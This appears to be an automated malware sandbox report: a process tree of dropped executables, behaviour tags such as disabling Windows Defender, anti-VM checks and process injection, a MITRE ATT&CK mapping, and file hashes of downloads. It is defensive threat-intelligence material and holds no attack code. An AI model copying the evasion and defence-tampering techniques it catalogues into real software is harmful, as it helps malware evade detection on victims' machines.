C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.2.87329680\1332672079" -childID 1 -isForBrowser -prefsHandle 1792 -prefMapHandle 1800 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed3cd48c-b326-4ae7-8dff-f5a776d3aae7} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1772 1a4ae358 tab9⤵PID:2676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.3.1936006475\1157040684" -childID 2 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbdd7d33-086d-4c30-a1ab-ee020a6e0baa} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 2928 d62758 tab9⤵PID:952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.4.1761648579\1017233117" -childID 3 -isForBrowser -prefsHandle 3652 -prefMapHandle 3648 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6940b65-7212-4734-a376-81b1733c4e0a} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3664 1a683158 tab9⤵PID:2852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.5.53251615\1003073296" -childID 4 -isForBrowser -prefsHandle 3768 -prefMapHandle 3772 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d4dba85-d134-42f0-96c1-8cc14649cce4} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3756 1a682e58 tab9⤵PID:1892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.6.672532396\1251112746" -childID 5 -isForBrowser -prefsHandle 3808 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77f688a4-772b-4eb7-942d-8b40483e0a8b} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 3828 1a684958 tab9⤵PID:1040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381690101\7a9f3697b2.exe"C:\Users\Admin\AppData\Local\Temp\10381690101\7a9f3697b2.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\10381700101\76de0e6834.exe"C:\Users\Admin\AppData\Local\Temp\10381700101\76de0e6834.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe"C:\Users\Admin\AppData\Local\Temp\10381710101\21c94957e7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3452
-
-
C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe"C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3652 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381720101\ec2d8d45c3.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3820
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe"C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381730101\00c0c811d7.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2036
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
7Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\soft[1]
Filesize1.8MB
MD50ed490bfd267269adab9e7c3db3a2ccd
SHA1bd5111ca25300c8bbd853fe664c0dd76b5d0dc66
SHA2565505795c806570f310ff901a733036df277ae7c8a5262e2fa3b8cc8be57ae48c
SHA512dc40e223d2f8b3f6de2a6e78e2d2b0bf3d60d2c880cb58b988ee1b490c4c1419ca633f96d354ca75789cc252dd6d64ef88be89f616ae472395ecb36bb356a03e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD525f9eafeeb1b63c94d418b4132f37ae4
SHA1d007705ea41f15071dfddf33b6c83e991b200ea0
SHA256531a69789587e535c95c02165528b27adf480ca0e81567b71e3f428bb0caeca1
SHA512a740544f80f122d7c327a7790d875f728c2b68111f1e9731c0e03eb3a0ef56e17e766b6390e3e53914d01cb946a454f7a62f466a2e73feb8615bca53f1192cfe
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.7MB
MD55dd55b0c5021bf7a1abd5dcff2598695
SHA1d523df50545388ae0465ed4ef58e05c387b38d8d
SHA256143fa09fc53e1bd7eb74d005c66f39a90b87901b69b6ea3209e4c33cf7b70f0c
SHA512a36dd71d4b48a30f0ef92bbbe59d9f1accfe152b7fec9c4f1a3896485bed084963821b5e6cb975bdd69ad3b867ed9c497733583f2e04f0617ebb2d6daef8670b
-
Filesize
950KB
MD5abb7738b0d8041d72718a0358da1d866
SHA16f0a0aeccbab99ab5e06819e48c0a5761e42a1ab
SHA25677b0911b9840fed6e2bb625e00e221adc5b5868198b4916303675154b4b81d5e
SHA51269097dd3019455023f0b142d65ae68525b372e0960d0e9995340ef736461582e459608475b361cb47d97055cc7cbc88642b55f6966ec6461289f92a6406bc0c9
-
Filesize
1.7MB
MD5c5531ef7f8f5936fbaef26e92eff6586
SHA1b29d02e373485971da8fba4093d5b2ecc711b07c
SHA256235dad4176b568a8137525842b7da13817e7685b83b9970839b1c67b8f732c1f
SHA512dc00c684f0f4c5db6c2f3c73fb8906c596c6efa008149b9a8c9db08ec6fc07a9fb409d3d0fc70132032a3f2d58e127d897cdc8005e2da297b221da03b7d27a6f
-
Filesize
1.8MB
MD5242617c7d9c922457ad4ea64cb40f6ea
SHA19725d4a1e476d9fb9d3e0b495fa4796b250470ba
SHA256f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2
SHA512f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab
-
Filesize
320KB
MD512335af9a4620d3d3ee7739c602f5747
SHA18d25d6fcb88ca41bb33a566fd3d358c29014446b
SHA256610cf4f6f84e7d6e3b227df0381114ffe74aa510496352dcecf54272bd147d18
SHA512b941ea37c928ca64fb6d893e2ac2d258d96e097f96df690e2c0a25dcf65d4b9dedfb62da73ee916fe76918801a48e35df5e2ba2b968c95f170ef0ef5d986c01b
-
Filesize
240KB
MD5fdd55ad9190ca9a56c0d400d65b7504f
SHA1cd2e1d9636fa035ec3c739a478b9f92bf3b52727
SHA25679c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487
SHA512bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb
-
Filesize
4.5MB
MD5f0a8d70133d24e01a0988f692ac1f18d
SHA128f7ff1ba6dcb47018a33f364303f8dcaf362a67
SHA2568d490549fd996897d7333c1d9a6e6ce220432b147582f4e174f8cc427c338559
SHA51254559c608af47cb2863493dfbe952cfde2d42a8a6ddab59836d3e1aa8c6d939b2851bddc6f5c9b5fca94e9ae24d986b928d7b3e08b86e630c1b520313c286889
-
Filesize
4.3MB
MD54ea661c85a082117e59ea78f2f140a1c
SHA149940f31bc96b08d70c1ef56d010ea320f9bbb74
SHA256389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a
SHA512df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394
-
Filesize
717B
MD5de93fae868e76046cd5fdbd9f381c5bc
SHA1b9ff5f7210a226dd42ac5c1eb756abbb479f62b8
SHA2560d265f92a184868ec8ffef463bf16f5ee3a09fd27c36129e6f3196c330a1310e
SHA5121e57c7886a0704b9a662ff2b8076ec93e99ee3ce05b0ee4a7d810b16c3a76dacc55573e6bb14206f4a7a72ae9c2c93b2a080347a9aa6a4a81667048673c6d58f
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5f3b54aa7f32d78e7b49c44654d62825d
SHA13f8c618c9a1921c7e0be8d7c6ae60640ec1b0f63
SHA256d117d2e684a93c1743f061d941054392e88dc0e34c9944e7863de36102e7d73e
SHA5122a1f05b140cfceb76bc8935f77d3eeef0ad179b484441ab9308ae2e400f7a5f53fbfb4279b8381b74ced1987d33d8a2aa628e7152b534a6a01a9ad9fb86327d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\242baa5d-1093-44ba-9ed5-4598bb843613
Filesize12KB
MD5d5658afed2f2bfa238ea6daa58b39408
SHA1b3f34066da07f914e0919f4dce3a45c1ead6e208
SHA2560fda65e750f74f54df4a2cb84a4f4c5c53df95280e83488b9f6f8bfd3d57b338
SHA512bbf67d89edead4fb540bc649898659e95b39e7dd2fd7cfc632ee58ba5dfd790fd24f0de97c998a0c3b503e7b773d79e685a9ffa7870fd24561adf9b2e54422d5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\b7a3f615-67be-44ec-aa00-22bdb7b3b006
Filesize745B
MD58d8b5a39169fae103f48e30421a3af02
SHA170fef005ffff2d9f52c31b28e646df5f337fc64e
SHA256f880ffc290054fbd0b6d9cbc251c16ff60fe69b6e19757e3a2cdb23b610be10f
SHA51207a6578c8f1217998e7cd42c6de63691511c3f484cfb8c33f263616e5c93cceea1be69060512c1ffc86e4e722faab8b9e1af30a7ea34ccaac8deb46fb661c106
-
Filesize
6KB
MD5499f99a0ce460365fe8f734df0ce49d5
SHA1aecbecd51865bdb4a2eef4d520050c4eada6c5dd
SHA256236dbfc9dd69ca66d181a0e8739838075e3be86f0f9abbef53dcd148644296b9
SHA512e9adab6310e7f299c830e9ba33727da5d7591846a5325e752cf3c6edea7a03b8709bfd398c5d78e1ff6b56b82f482d1825cd7f6244a49b89ff1af9b9cdfe6264
-
Filesize
6KB
MD5ac3d7cf17f166bae84efb808ea9b13f9
SHA16121f914b9cc2d7ca42ec561c7941c73bd55e381
SHA25697db6e975068faf2bb9f74c67f8dd8fb74ac1e1adee25c39cd143d73ca2b557f
SHA512991f38948eee57dbc0b13f0da335fe46109d489533cfcf7dfece89964ac1e343ad69910d3db0d6193a7b5701a42b9c6b463089e425ca872300e45a1978672dd2
-
Filesize
6KB
MD5446165e788c0e0df54faf273b55e311b
SHA18e796a6b4fe22a741d51f47df0e1ce29f4dd085e
SHA256780574c4dfc80388b97ce9acd1867873cfabf99e7b2d927ceda698b0c293ebc3
SHA5121cbe28b7ae774c56548735754e180372e11f9ea4b4f189e6bce6c0fbd33d96e3d0a3df99a6332377f1f1771862b74ca98c2414a0c703d4fc740b600cf2f7b568
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD59d81061f22595dddbe6659b52386f521
SHA1383abf7ccc00b8640794774ac7a467b19d89a341
SHA256b900aa29c4921a25b74b09812048ab657650fa459b53f02ca4a4f25e14e4d865
SHA512883ba5cfc235ecc5022c9933daac703fa409f7ff0d9b35f495d1257b68e17d7e9f49b72803c7a3a4f87cd89b920066fdf91c3f2ebbf14df0acf5652470ccb916
-
Filesize
1.8MB
MD589431b16b25281a50a173f359ecbcebf
SHA1a5931bc59fd615f199461eb009262d26ff34c814
SHA25678d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e
SHA512498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2